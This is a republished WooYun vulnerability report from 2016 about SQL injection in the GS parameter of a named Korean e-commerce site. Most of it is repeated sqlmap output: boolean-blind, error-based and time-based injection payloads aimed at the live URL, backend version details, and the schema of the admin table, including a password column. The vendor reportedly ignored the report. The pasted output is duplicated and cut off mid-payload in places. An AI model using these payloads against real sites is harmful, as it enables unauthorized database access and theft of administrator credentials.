韩尚聚某站存在sql注入漏洞 admin 102755文章 87评论 2017年4月30日23:47:19评论417 views字数 210阅读0分42秒阅读模式 摘要2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开 漏洞概要 关注数(0) 关注此漏洞 缺陷编号: WooYun-2016-195121 漏洞标题: 韩尚聚某站存在sql注入漏洞 相关厂商: 韩尚聚 漏洞作者: unfound 提交时间: 2016-04-14 14:16 公开时间: 2016-05-29 14:20 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 20 漏洞状态: 未联系到厂商或者厂商积极忽略 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 注射技巧 0人收藏 漏洞详情 披露状态: 2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 详细说明: 测试地址:http://www.koyimall.com/?act=shop.goods_view&GS=219967 测试参数:GS code 区域 lace: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),Csqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 current user is DBA: False sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 Database: koyimall Table: durian_buy [851 entries] 漏洞证明: code 区域 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 Database: koyimall Table: durian_admin [14 columns] +-----------------------+--------------+ | Column | Type | +-----------------------+--------------+ | admin_email | varchar(70) | | admin_id | varchar(20) | | admin_is_priv_officer | tinyint(4) | | admin_level | int(11) | | admin_memo | varchar(200) | | admin_mobile | varchar(20) | | admin_mod_date | datetime | | admin_name | varchar(30) | | admin_nick | varchar(100) | | admin_passwd | varchar(40) | | admin_reg_date | datetime | | admin_status | tinyint(4) | | admin_tel | varchar(20) | | com_seq | int(11) | +-----------------------+--------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 修复方案: 你懂得 版权声明:转载请注明来源 unfound@乌云 漏洞回应 厂商回应: 未能联系到厂商或者厂商积极拒绝 漏洞Rank:15 (WooYun评价) 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 点赞 http://cn-sec.com/archives/15540.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论